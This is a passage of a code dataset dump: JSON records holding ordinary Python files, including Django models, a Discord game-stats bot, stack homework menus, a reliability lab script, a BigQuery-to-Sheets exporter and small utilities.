sys.argv[2])\n","repo_name":"ideasrule/platon","sub_path":"misc/load_grid.py","file_name":"load_grid.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"48"} +{"seq_id":"39108493464","text":"from django.conf import settings\nfrom django.db import models\nfrom django.dispatch import receiver\nimport os\n\n\nclass Ticket(models.Model):\n title = models.CharField('Titre', max_length=128)\n description = models.TextField(max_length=2048, blank=True)\n user = models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='tickets')\n image = models.ImageField(null=True, blank=True, upload_to='images/')\n time_created = models.DateTimeField(auto_now_add=True)\n\n\nclass Review(models.Model):\n class Ratings(models.IntegerChoices):\n TRASH = 0\n VERY_BAD = 1\n BAD = 2\n MEEEE = 3\n GOOD = 4\n PERFECT = 5\n\n # ticket.reviews will give us list of review which ticket corresponds to the current ticket.\n ticket = models.ForeignKey(to=Ticket, on_delete=models.CASCADE, related_name='reviews')\n rating = models.IntegerField(choices=Ratings.choices)\n user = models.ForeignKey(\n to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name='reviews',\n )\n headline = models.CharField('Titre', max_length=128)\n body = models.TextField('Commentaire', max_length=8192, blank=True)\n time_created = models.DateTimeField(auto_now_add=True)\n\n class Meta:\n unique_together = ('ticket', 'user', ) # a user can't make 2 reviews of the same ticket\n\n\nclass UserFollows(models.Model):\n user = models.ForeignKey(to=settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name='is_following')\n followed_user = models.ForeignKey(\n to=settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n related_name='is_followed_by',\n )\n\n class Meta:\n # ensures we don't get multiple UserFollows instances\n # for unique user-user_followed pairs\n unique_together = ('user', 'followed_user', )\n constraints = [\n models.CheckConstraint(\n name=\"cant_follow_self\",\n check=~models.Q(user=models.F(\"followed_user\")),\n ),\n ]\n\n\n@receiver(models.signals.post_delete, sender=Ticket)\ndef delete_image_on_ticket_delete(sender, instance, **kwargs):\n \"\"\"\n Delete image when ticket is deleted.\n \"\"\"\n if instance.image:\n if os.path.isfile(instance.image.path):\n os.remove(instance.image.path)\n\n\n@receiver(models.signals.pre_save, sender=Ticket)\ndef update_image_on_ticket_update(sender, instance, **kwargs):\n \"\"\"\n Deletes old image from filesystem\n when corresponding `Ticket` object is updated\n with new image.\n \"\"\"\n if not instance.pk:\n return False\n\n try:\n old_image = sender.objects.get(pk=instance.pk).image\n if not old_image:\n # Rare case when image doesn't exist but no exception raised.\n return False\n except sender.DoesNotExist:\n return False\n\n new_image = instance.image\n if not old_image == new_image:\n if os.path.isfile(old_image.path):\n os.remove(old_image.path)\n","repo_name":"Riazzor/LitReview","sub_path":"reviewer/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73203152145","text":"import discord\nimport requests\n\nkey = \"key\"\n\ndef get_player(message):\n split_msg = message.content.split(\" \", 1)\n name = split_msg[1].replace(\" \", \"%20\")\n \n try:\n id_data = requests.get(\"https://api.brawlhalla.com/search?steamid=\" + name 
+ \"&api_key=\" + key)\n id = id_data.json()[\"brawlhalla_id\"]\n except: return discord.Embed(title=\"Can not find player\")\n\n data = requests.get(\"https://api.brawlhalla.com/player/\" + str(id) + \"/stats?api_key=\" + key)\n ranked_data = requests.get(\"https://api.brawlhalla.com/player/\" + str(id) + \"/ranked?api_key=\" + key)\n\n data = data.json()\n ranked_data = ranked_data.json()\n\n user_name = data[\"name\"]\n level = data[\"level\"]\n games = data[\"games\"]\n wins = data[\"wins\"]\n\n embed = discord.Embed(title=f\"Brawlhalla {user_name}\",\n color=message.guild.me.top_role.color,\n timestamp=message.created_at, )\n embed.add_field(name=\"Level\", value=f\"{level}\")\n embed.add_field(name=\"Games\", value=f\"{games}\")\n embed.add_field(name=\"Wins\", value=f\"{wins}\")\n\n try:\n rank = ranked_data[\"tier\"]\n ranked_games = ranked_data[\"games\"]\n ranked_wins = ranked_data[\"wins\"]\n embed.add_field(name=\"Rank\", value=f\"{rank}\")\n embed.add_field(name=\"Ranked games\", value=f\"{ranked_games}\")\n embed.add_field(name=\"Ranked wins\", value=f\"{ranked_wins}\")\n except:\n embed.add_field(name=\"Ranked games\", value=f\"Never played ranked\")\n\n embed.set_footer(text=f\"Requested by {message.author.name}\")\n\n return embed","repo_name":"kasparpollet/py_bot","sub_path":"venv/brawlhalla.py","file_name":"brawlhalla.py","file_ext":"py","file_size_in_byte":1587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36581356890","text":"# Создаем пустой список для хранения чисел\nnumber_list = []\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить число в список\")\n print(\"2. Удалить все вхождения числа из списка\")\n print(\"3. Показать содержимое списка (с начала или с конца)\")\n print(\"4. Проверить есть ли значение в списке\")\n print(\"5. Заменить значение в списке\")\n print(\"6. Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6): \")\n\n if choice == \"1\":\n num = int(input(\"Введите число для добавления: \"))\n if num not in number_list:\n number_list.append(num)\n else:\n print(f\"Число {num} уже существует в списке.\")\n\n elif choice == \"2\":\n num = int(input(\"Введите число для удаления: \"))\n number_list = [x for x in number_list if x != num]\n\n elif choice == \"3\":\n direction = input(\"Показать с начала или с конца? (начало/конец): \")\n if direction == \"начало\":\n print(number_list)\n elif direction == \"конец\":\n print(number_list[::-1])\n\n elif choice == \"4\":\n num = int(input(\"Введите число для проверки: \"))\n if num in number_list:\n print(f\"Число {num} есть в списке.\")\n else:\n print(f\"Числа {num} нет в списке.\")\n\n elif choice == \"5\":\n num = int(input(\"Введите число для замены: \"))\n new_num = int(input(\"Введите новое число: \"))\n replace_all = input(\"Заменить все вхождения? (да/нет): \")\n if replace_all == \"да\":\n number_list = [new_num if x == num else x for x in number_list]\n else:\n for i in range(len(number_list)):\n if number_list[i] == num:\n number_list[i] = new_num\n\n elif choice == \"6\":\n break\n#_________________________________________________________________________________________________\nclass DynamicStack:\n def __init__(self):\n self.stack = []\n\n def push(self, value):\n self.stack.append(value)\n\n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n print(\"Стек пуст. 
Невозможно извлечь элемент.\")\n return None\n\n def count(self):\n return len(self.stack)\n\n def is_empty(self):\n return len(self.stack) == 0\n\n def clear(self):\n self.stack = []\n\n def peek(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n print(\"Стек пуст. Невозможно получить элемент.\")\n return None\n\n# Пример использования\nstack = DynamicStack()\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить строку в стек\")\n print(\"2. Вытолкнуть строку из стека\")\n print(\"3. Количество строк в стеке\")\n print(\"4. Проверить пустой ли стек\")\n print(\"5. Очистить стек\")\n print(\"6. Получить значение без выталкивания\")\n print(\"7. Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6/7): \")\n\n if choice == \"1\":\n value = input(\"Введите строку для добавления в стек: \")\n stack.push(value)\n\n elif choice == \"2\":\n popped_value = stack.pop()\n if popped_value is not None:\n print(f\"Извлечено: {popped_value}\")\n\n elif choice == \"3\":\n print(f\"Количество строк в стеке: {stack.count()}\")\n\n elif choice == \"4\":\n if stack.is_empty():\n print(\"Стек пуст.\")\n else:\n print(\"Стек не пуст.\")\n\n elif choice == \"5\":\n stack.clear()\n print(\"Стек очищен.\")\n\n elif choice == \"6\":\n peeked_value = stack.peek()\n if peeked_value is not None:\n print(f\"Верхняя строка в стеке: {peeked_value}\")\n\n elif choice == \"7\":\n break\n\n \n\n\n\n#_________________________________________________________________________________________________\n\nclass FixedSizeStack:\n def __init__(self, max_size):\n self.stack = []\n self.max_size = max_size\n\n def push(self, value):\n if len(self.stack) < self.max_size:\n self.stack.append(value)\n else:\n print(\"Стек полный. Невозможно добавить элемент.\")\n\n def pop(self):\n if not self.is_empty():\n return self.stack.pop()\n else:\n print(\"Стек пуст. Невозможно извлечь элемент.\")\n return None\n\n def count(self):\n return len(self.stack)\n\n def is_empty(self):\n return len(self.stack) == 0\n\n def is_full(self):\n return len(self.stack) == self.max_size\n\n def clear(self):\n self.stack = []\n\n def peek(self):\n if not self.is_empty():\n return self.stack[-1]\n else:\n print(\"Стек пуст. Невозможно получить элемент.\")\n return None\n\n# Пример использования\nstack = FixedSizeStack(5)\n\nwhile True:\n print(\"Меню:\")\n print(\"1. Добавить строку в стек\")\n print(\"2. Вытолкнуть строку из стека\")\n print(\"3. Количество строк в стеке\")\n print(\"4. Проверить пустой ли стек\")\n print(\"5. Проверить полный ли стек\")\n print(\"6. Очистить стек\")\n print(\"7. Получить значение без выталкивания\")\n print(\"8. 
Выйти\")\n\n choice = input(\"Выберите действие (1/2/3/4/5/6/7/8): \")\n\n if choice == \"1\":\n value = input(\"Введите строку для добавления в стек: \")\n stack.push(value)\n\n elif choice == \"2\":\n popped_value = stack.pop()\n if popped_value is not None:\n print(f\"Извлечено: {popped_value}\")\n\n elif choice == \"3\":\n print(f\"Количество строк в стеке: {stack.count()}\")\n\n elif choice == \"4\":\n if stack.is_empty():\n print(\"Стек пуст.\")\n else:\n print(\"Стек не пуст.\")\n\n elif choice == \"5\":\n if stack.is_full():\n print(\"Стек полный.\")\n else:\n print(\"Стек не полный.\")\n\n elif choice == \"6\":\n stack.clear()\n print(\"Стек очищен.\")\n\n elif choice == \"7\":\n peeked_value = stack.peek()\n if peeked_value is not None:\n print(f\"Верхняя строка в стеке: {peeked_value}\")\n\n elif choice == \"8\":\n break","repo_name":"Asirush/python","sub_path":"hw/hw_22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7233,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"36580364365","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nfrom scipy.stats.distributions import chi2\nimport numpy as np\n\ndef calculate_mean(nfails, km, nyears):\n return nfails / (km * nyears)\ndef assignment_1(name, nfails, km, nyears):\n # 1.1\n # repair time for EHV and HV is 44 hours on average (From table 2.3)\n\n f = calculate_mean(nfails, km, nyears) # failure rate\n print(\"Failure frequency for {} = {}\".format(name, f))\n\n # Mean Time To Failure (MTTF)\n mttf = (nyears * 8760) / nfails\n print(\"Mean Time To Failure (MTTF) for {} = {}\".format(name, mttf))\n\n # Mean Time To Repair (MTTR)\n mttr = 44\n print(\"Mean Time To Repair (MTTR) for {} = {}\".format(name, mttr))\n\n # Mean Time Between Failures (MTBF)\n mtbf = mttf + mttr\n print(\"Mean Time Between Failures for {} = {}\\n\".format(name, mtbf))\n\n return f\n\n\ndef assignment_2(name, nfails, km, nyears, mean):\n # 1.2\n\n # l = average failure rate [/cctkm·yr] or [/comp·yr]\n # T = total considered time length (component-years) [cctkm·yr] or [comp·yr]\n # F = statistical number of failures within T [-]\n # alpha = significance level [-]\n # χ2 = Chi-square distribution.\n # 1-α/2 or α/2 = probability\n # 2F or 2F+2 = degrees of freedom\n\n T = nyears * km # years\n alpha = 0.05 # 95% confidence interval\n F = nfails # number of failures\n\n confidence_interval_right = chi2.ppf(1 - alpha / 2, 2 * F) / (2 * T)\n confidence_interval_left = chi2.ppf(alpha / 2, 2 * F + 2) / (2 * T)\n\n print(\"{}% Confidence interval for {} = [{}, {}]\"\n .format((1 - alpha) * 100, name, confidence_interval_left, confidence_interval_right))\n\n # figure related code\n fig = plt.figure()\n fig.suptitle('Assignment 2', fontsize=14, fontweight='bold')\n if name.find(\"5\") == -1:\n fig.suptitle('Assignment 3', fontsize=14, fontweight='bold')\n\n ax = fig.add_subplot(111)\n ax.boxplot([confidence_interval_left, mean, confidence_interval_right])\n\n ax.set_title('Failure frequency for {}'.format(name))\n\n quantiles = np.quantile([confidence_interval_left, mean, confidence_interval_right], np.array([0.00, 0.25, 0.50, 0.75, 1.00]))\n ax.hlines(quantiles, [0] * quantiles.size, [1] * quantiles.size,\n color='b', ls=':', lw=0.5, zorder=0)\n ax.set_xlim(0.5, 1.5)\n ax.set_yticks(quantiles)\n\n if name.find(\"5\") == -1:\n fig.savefig('Assignment 3 - Failure frequency for {}.png'.format(name))\n else:\n fig.savefig('Assignment 2 - Failure 
frequency for {}.png'.format(name))\n    #plt.show()\n\ndef assignment_3():\n    # 3 years later\n    # 42 EHV OHL failures\n    # 167 HV OHL failures\n    # 2471 km of EHV OHL\n    # 4078 km of HV OHL\n\n    # Calculate the failure frequencies of EHV, HV, and EHV/HV OHLs again, together with their\n    # 95% confidence intervals. Also plot the results as a boxplot\n    print(\"\\n\\nAssignment 3:\\n\")\n\n    mean_EHV_3 = assignment_1('EHV-8years', 42, 2471, 8)\n    mean_HV_3 = assignment_1('HV-8years', 167, 4078, 8)\n\n    assignment_2('EHV-8years', 42, 2471, 3, mean_EHV_3)\n    assignment_2('HV-8years', 167, 4078, 3, mean_HV_3)\n    assignment_2('EHV-HV-8years', 42 + 167, 2471 + 4078, 3, mean_EHV_3 + mean_HV_3)\n\ndef assignment_4():\n    print(\"\\n\\nAssignment 4:\\n\")\n    df = pd.read_csv(\"repair_times_OHL.csv\")\n    data = df[\"Repair Times\"].values.tolist()\n    data.sort()\n    print(\"Repair times: \", data)\n    print(\"Average repair time = {}\".format(sum(data) / len(data)))\n    print(\"Minimum repair time = {}\".format(min(data)))\n    print(\"Maximum repair time = {}\".format(max(data)))\n\ndef assignment_5():\n    print(\"\\n\\nAssignment 5:\\n\")\n    df = pd.read_csv(\"repair_times_OHL.csv\")\n    data = df[\"Repair Times\"].values.tolist()\n\n    # figure related code\n    fig = plt.figure()\n    fig.suptitle('Assignment 5', fontsize=14, fontweight='bold')\n\n    ax = fig.add_subplot(111)\n    ax.boxplot(data)\n\n    ax.set_title('Repair times for OHL')\n\n    quantiles = np.quantile(data, np.array([0.00, 0.25, 0.50, 0.75, 1.00]))\n    ax.hlines(quantiles, [0] * quantiles.size, [1] * quantiles.size,\n              color='b', ls=':', lw=0.5, zorder=0)\n    ax.set_xlim(0.5, 1.5)\n    ax.set_yticks(quantiles)\n    # ax.set_yticklabels(quantiles, rotation=30, fontsize=8)\n\n    fig.savefig('Assignment 5 - Repair times.png')\n    #plt.show()\n\n\ndef assignment_6():\n    print(\"\\n\\nAssignment 6:\\n\")\n    # F(t) = fraction of unrepaired components (1=no repaired components, 0=all components repaired) [-]\n    # t = time [h]\n    # T1 (-b) = repair time (according to the exponential distribution) [h]\n    # a = coefficient of the exponential term\n    # c = independent term\n    df = pd.read_csv(\"repair_times_OHL.csv\")\n    data = df[\"Repair Times\"].values.tolist()\n    data.sort()\n    Ft = np.arange(1.0/(len(data)+1), 1.00001-1.0/(len(data)+1), 1/(len(data) + 1))\n    x_axis = np.arange(0, 70 + 0.00001, 0.1)\n    params, covariance = curve_fit(exponential, data, Ft)\n    # figure related code\n    fig = plt.figure()\n    fig.suptitle('Assignment 6', fontsize=14, fontweight='bold')\n\n    ax = fig.add_subplot(111)\n    ax.scatter(data, Ft)\n    ax.plot(x_axis, exponential(x_axis, *params), '--')\n\n    ax.set_title('Fitted exponential curve')\n\n    fig.savefig('Assignment 6 - Fitted exponential curve.png')\n    # plt.show()\n    print(params)\n\n\ndef exponential_old(t, a, b, c):\n    return a * np.exp(-b * np.asarray(t)) + c\n\n\ndef exponential(t, b):\n    return -np.exp(-b * np.asarray(t)) + 1\n\n\nif __name__ == '__main__':\n    print(\"Assignment 1:\\n\")\n    mean_EHV = assignment_1('EHV', 25, 2310, 5)\n    mean_HV = assignment_1('HV', 51, 3329, 5)\n    mean_EHV_HV = assignment_1('EHV+HV', 76, 5639, 5)\n    if mean_EHV > mean_HV:\n        print(\"EHV has a higher failure frequency than HV\\n\\n\")\n    else:\n        print(\"HV has a higher failure frequency than EHV\\n\\n\")\n\n    print(\"Assignment 2:\\n\")\n    assignment_2('EHV-5years', 25, 2310, 5, mean_EHV)\n    assignment_2('HV-5years', 51, 3329, 5, mean_HV)\n    assignment_2('EHV-HV-5years', 25 + 51, 2310 + 3329, 5, mean_EHV_HV)\n\n    assignment_3()\n    assignment_4()\n    assignment_5()\n    
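# assignment_6 below fits the exponential CDF F(t) = 1 - exp(-b*t) to the sorted repair times\n    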
assignment_6()\n\n\n","repo_name":"dansavastre/Reliability-of-Sustainable-Power-Systems","sub_path":"Lab1.py","file_name":"Lab1.py","file_ext":"py","file_size_in_byte":6209,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"5086177776","text":"from typing import List, Optional, Tuple\n\nimport numpy as np\n\nfrom ..detection.detection_types import Detection\nfrom ..utils.rectangle import Rectangle\nfrom ..utils.timing import get_current_time_millis\n\n\ndef split_image_into_squares(image: np.ndarray) -> Tuple[np.ndarray, np.ndarray]:\n height, width, _ = image.shape\n return (image[:, :height, :], image[:, width - height :, :])\n\n\ndef get_split_image_dimensions(\n image: np.ndarray,\n) -> List[Rectangle]:\n height, width, _ = image.shape\n return [\n Rectangle(0, 0, height, height),\n Rectangle(width - height, 0, width, height),\n ]\n\n\nclass CameraImageContainer:\n def __init__(\n self,\n camera_name: str,\n raw_image_np: np.ndarray,\n dimensions: List[Rectangle],\n cropped_images: List[np.ndarray],\n detailed: bool,\n created_at: int,\n ):\n self.camera_name = camera_name\n self.raw_image_np = raw_image_np\n self.dimensions = dimensions\n self.cropped_images = cropped_images\n self.detailed = detailed\n self.created_at = created_at\n\n @classmethod\n def create(\n cls,\n camera_name: str,\n raw_image_np: np.ndarray,\n dimensions: List[Rectangle],\n detailed: bool = False,\n created_at: Optional[int] = None,\n ) -> \"CameraImageContainer\":\n if created_at is None:\n created_at = get_current_time_millis()\n\n cropped_images = [\n raw_image_np[\n crop_image_dimensions.y1 : crop_image_dimensions.y2,\n crop_image_dimensions.x1 : crop_image_dimensions.x2,\n :,\n ]\n for crop_image_dimensions in dimensions\n ]\n\n return cls(\n camera_name, raw_image_np, dimensions, cropped_images, detailed, created_at\n )\n\n\nclass DetectionCameraImageContainer:\n camera_image_container: CameraImageContainer\n detections: List[Detection]\n\n def __init__(\n self, camera_image_container: CameraImageContainer, detections: List[Detection]\n ):\n self.camera_image_container = camera_image_container\n self.detections = detections\n\n def has_detections(self):\n return len(self.detections) > 0\n","repo_name":"tkislan/smart-nvr","sub_path":"smart_nvr/camera/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42803827234","text":"import random\nGAME_LIMIT = 21\n\n\ndef roll_dice():\n user_roll = random.randint(1, 3)\n computer_roll = random.randint(1, 3)\n return user_roll, computer_roll\n\n\ndef get_response():\n response = input(\"Do you want to roll? 
(y/n): \")\n return response\n\n\ndef main():\n user_points = 0\n computer_points = 0\n print(\"Welcome to the game of 21!\")\n print()\n isEnd = False # added a is game end\n\n while not isEnd:\n answer = get_response()\n if(answer == \"y\"): # checkes whther still roll dice\n points, comp_points = roll_dice()\n user_points += points\n computer_points += comp_points\n print(\"User Points:\", user_points)\n print(\"Computer Points:\", computer_points)\n if user_points == GAME_LIMIT:\n print(\"User's Points:\", user_points)\n print(\"Computer's Points:\", computer_points)\n if computer_points == GAME_LIMIT:\n print(\"Tie Game!\")\n else:\n print(\"User Wins!\")\n isEnd = True\n if user_points > GAME_LIMIT:\n print(\"User's Points:\", user_points)\n print(\"Computer's Points:\", computer_points)\n if computer_points < GAME_LIMIT:\n print(\"Computer Wins!\")\n elif computer_points == GAME_LIMIT:\n print(\"Computer Wins!\")\n else:\n print(\"Tie Game!\")\n isEnd = True\n\n if (answer == \"n\"):\n isEnd = True\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"phamnhatcn06/python","sub_path":"buoi11/the21game.py","file_name":"the21game.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"60197919","text":"from webscraping.utilities.utility import descargarimagen, downloadinfo_url, downloadparrafos\nfrom tests.utilities import clean_up, clean_enlace\nimport os\n\n\n######UNIT TEST################\ndef test_descargarimagen():\n soup = clean_enlace()\n myimg = soup.findAll(\"img\")[0]\n descargarimagen(myimg)\n assert os.path.exists(\"400px-Municipalities_of_Spain.svg.png\") == True\n\ndef test_descargarparrafo():\n clean_up(\"*.txt\")\n soup = clean_enlace()\n downloadparrafos(soup)\n assert os.path.exists(\"Output.txt\") == True\n\n\n\n\n#######END TO END TEST#############\ndef test_main():\n clean_up(\"*.png\")\n clean_up(\"*.txt\")\n enlace = \"https://es.wikipedia.org/wiki/Anexo:Municipios_de_Espa%C3%B1a_por_poblaci%C3%B3n\"\n nimg = 4\n imagenes_desc = downloadinfo_url(enlace,nimg)\n for img in imagenes_desc:\n assert os.path.exists(img) == True\n assert len(imagenes_desc) == nimg\n assert os.path.exists(\"Output.txt\") == True\n\n\n\n\n\n ","repo_name":"jordicam/web-scraping","sub_path":"tests/test_general.py","file_name":"test_general.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73652225744","text":"import pywhatkit as kit\n\n\ndef yt_play(*arg, **kwargs):\n inp_command = kwargs.get(\"query\")\n kit.playonyt(inp_command)\n return \"Playing Video on Youtube\"\n\n\nif __name__ == \"__main__\":\n yt_play('play on youtube shape of you')\n","repo_name":"Dipeshpal/Jarvis_AI","sub_path":"JarvisAI/JarvisAI/features/youtube_play.py","file_name":"youtube_play.py","file_ext":"py","file_size_in_byte":234,"program_lang":"python","lang":"en","doc_type":"code","stars":296,"dataset":"github-code","pt":"48"} +{"seq_id":"17112331335","text":"from google.cloud import bigquery\nfrom gspread_dataframe import get_as_dataframe, set_with_dataframe\nfrom google_auth_oauthlib import flow\nimport gspread\nimport sys\nimport argparse\nimport logging\n\ndef get_credentials(secrets, local):\n appflow = flow.InstalledAppFlow.from_client_secrets_file(secrets, scopes=[\"https://www.googleapis.com/auth/bigquery\", \"https://www.googleapis.com/auth/logging.write\", 
\"https://www.googleapis.com/auth/spreadsheets\"])\n\n if local:\n # Automatically set to run as host='localhost', port=8080\n appflow.run_local_server()\n else:\n appflow.run_console()\n\n return appflow.credentials\n\n\ndef setup_bq_client(credentials=None, projectid=None):\n if credentials:\n return bigquery.Client(project=projectid, credentials=credentials)\n return bigquery.Client()\n\ndef setup_sh_client(sheet_name, credentials=None, sheet_url=None):\n\n if credentials:\n gc = gspread.authorize(credentials)\n return gc.open_by_url(sheet_url)\n gc = gspread.service_account()\n return gc.open(sheet_name)\n\n\ndef bq_to_sheet(bqclient, sheet, query, tabname, job_config=None):\n\n # Run query and output to dataframe\n df_schema = bqclient.query(query, job_config=job_config).to_dataframe()\n\n # If worksheet does not exist, create and add dataframe\n try:\n worksheet = sheet.add_worksheet(tabname, df_schema.shape[0], df_schema.shape[1])\n set_with_dataframe(worksheet, df_schema)\n print(worksheet)\n except Exception as err:\n logging.error(RuntimeError('**********Failed to log the error*********'), err)\n else:\n # If worksheet exists, get and append dataframe\n worksheet = sheet.worksheet(tabname)\n existing = get_as_dataframe(worksheet)\n updated = existing.append(df_schema, sort=False)\n set_with_dataframe(worksheet, updated)\n\n return f\"Complete\"\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(description='Function to query BigQuery and store it in Google Sheets.')\n\n parser.add_argument('-q','--query', help='BQ query',required=True, dest='query')\n parser.add_argument('-n','--sheetname', help='Google Sheet name', dest='sheet_name')\n parser.add_argument('-u','--sheeturl', help='Google Sheet url', dest='sheet_url')\n parser.add_argument('-t','--tabname', help='Google Sheet tab name to store the data.',required=True, dest='tabname')\n parser.add_argument('-j', '--jobconfig', help='Job configuration for the query if needed but not required', required=False, dest='job_config', default=None)\n parser.add_argument('-s', help='Json file that has the API credentials if setting up end user oauth https://cloud.google.com/docs/authentication/end-user', dest='secrets')\n parser.add_argument('-l','--local', help='If setting up oauth on your personal machine. 
It will help open a browser window for authentication.', required=False, dest='local', type=bool, default=False)\n    parser.add_argument('-p','--pi', help='Project ID', dest='projectid', default=None)\n\n    par = parser.parse_args(sys.argv[1:])\n\n    credentials = None\n    if par.secrets:\n        credentials = get_credentials(par.secrets, par.local)\n\n    # Open BQ client\n    bqclient = setup_bq_client(credentials, par.projectid)\n\n    # Open Sheet client\n    sheet = setup_sh_client(par.sheet_name, credentials, par.sheet_url)\n\n    bq_to_sheet(bqclient, sheet, par.query, par.tabname, par.job_config)\n\n\n","repo_name":"google/project-OCEAN","sub_path":"archive/mailing-list-data-pipelines/3-analyze-data/sql/bq_to_sheet.py","file_name":"bq_to_sheet.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"48"} +{"seq_id":"5449995046","text":"import numpy as np\n\nfrom scipy.spatial import distance\n\n\ndef parse_input(input: str):\n    return np.array(\n        list(map(lambda line: list(map(int, line.split(\", \"))), input.splitlines()))\n    )\n\n\ndef part1(points):\n    xmin, ymin = points.min(axis=0) - 1\n    xmax, ymax = points.max(axis=0) + 2\n\n    xgrid, ygrid = np.meshgrid(np.arange(xmin, xmax), np.arange(ymin, ymax))\n    targets = np.dstack([xgrid, ygrid]).reshape(-1, 2)\n\n    cityblock = distance.cdist(points, targets, metric=\"cityblock\")\n\n    closest_origin = np.argmin(cityblock, axis=0)\n\n    min_distances = np.min(cityblock, axis=0)\n    competing_locations_filter = (cityblock == min_distances).sum(axis=0) > 1\n\n    closest_origin[competing_locations_filter] = len(points) + 1\n    closest_origin = closest_origin.reshape(xgrid.shape)\n    infinite_ids = np.unique(\n        np.vstack(\n            [\n                closest_origin[0],\n                closest_origin[-1],\n                closest_origin[:, 0],\n                closest_origin[:, -1],\n            ]\n        )\n    )\n    closest_origin[np.isin(closest_origin, infinite_ids)] = len(points) + 1\n\n    return np.max(np.bincount(closest_origin.ravel())[:-1])\n\n\ndef part2(points):\n    xmin, ymin = points.min(axis=0) - 1\n    xmax, ymax = points.max(axis=0) + 2\n\n    xgrid, ygrid = np.meshgrid(np.arange(xmin, xmax), np.arange(ymin, ymax))\n    targets = np.dstack([xgrid, ygrid]).reshape(-1, 2)\n\n    cityblock = distance.cdist(points, targets, metric=\"cityblock\")\n\n    origin_distances = cityblock.sum(axis=0)\n\n    region = np.where(origin_distances < 10000, 1, 0)\n\n    return region.sum()\n\n\ndef solve(input: str) -> str:\n    input = parse_input(input)\n    return f\"Day06\\nPart1: {part1(input)}\\nPart2: {part2(input)}\\n\"\n","repo_name":"alexjercan/aoc-2018","sub_path":"src/day06.py","file_name":"day06.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"3756155697","text":"\"\"\"Utilities for vector calculations.\"\"\"\nimport numpy as np\n\n\ndef fix_t_vectors(t1_poly, t2_poly, t3_poly):\n    \"\"\"Ensure the orientation vectors are orthogonal and normalized.\"\"\"\n    # normalize t3 so that remove_perp works\n    t3_poly /= np.linalg.norm(t3_poly, axis=1)[:, None]\n    # subtract the perpendicular projection of t1 on t3\n    dot = np.sum(t1_poly * t3_poly, axis=1)\n    t1_poly = t1_poly - dot[:, None] * t3_poly\n    # now t1 is pointing in the correct direction, normalize it\n    t1_poly /= np.linalg.norm(t1_poly, axis=1)[:, None]\n    # reset t2 to the cross product of t3 and t1\n    t2_poly = np.cross(t3_poly, t1_poly)\n    return t1_poly, t2_poly, 
t3_poly\n","repo_name":"tseariana/dynamic_sim","sub_path":"twlcsim/util/_vector.py","file_name":"_vector.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41221752086","text":"# Using a dynamic library from Python\nimport platform, os\nfrom ctypes import *\n\n# Detect the OS from Python --- (*1)\npf = platform.system()\nprint(pf)\n\n# On Windows --- (*2)\nif pf == 'Windows': libfile = 'mycalc.dll'\n# On macOS\nelif pf == 'Darwin': libfile = 'libmycalc.dylib'\n# On Linux\nelse: libfile = 'libmycalc.so'\n\n# Build the path to the dynamic library --- (*3)\nlibpath = os.path.join(os.path.dirname(__file__), libfile)\nprint(\"lib=\", libpath)\n\n# Load the library --- (*4)\nmycalc = cdll.LoadLibrary(libpath)\n# Call into the Rust library --- (*5)\nprint(mycalc.rust_mul(100, 8))\nprint(mycalc.rust_mul(8, 9))\n\n","repo_name":"kujirahand/book-rust","sub_path":"src/ch6/mycalc_test.py","file_name":"mycalc_test.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":71,"dataset":"github-code","pt":"48"} +{"seq_id":"42263629503","text":"import argparse\nfrom dataclasses import asdict\nfrom json import dumps\nfrom time import monotonic\n\nfrom covyx import analyze\n\nif __name__ == \"__main__\":\n    parser = argparse.ArgumentParser(\n        description=\"\"\"\n        Analyze a CT video,\n        see https://github.com/catneep/covyx#readme\n        for more information.\n        \"\"\"\n    )\n\n    parser.add_argument(\"path\", type=str, help=\"Path to local .mp4 file\")\n    parser.add_argument(\n        \"--time\",\n        dest=\"time\",\n        default=False,\n        action=\"store_true\",\n        help=\"output the analysis time\",\n    )\n    parser.add_argument(\n        \"--pretty\",\n        dest=\"pretty\",\n        default=False,\n        action=\"store_true\",\n        help=\"pretty print the result\",\n    )\n\n    args = parser.parse_args()\n\n    path, time, pretty = args.path, args.time, args.pretty\n\n    start = monotonic()\n    result = analyze(path)\n    end = monotonic() - start\n\n    result_dict = asdict(result)\n\n    if time:\n        result_dict[\"runtime\"] = 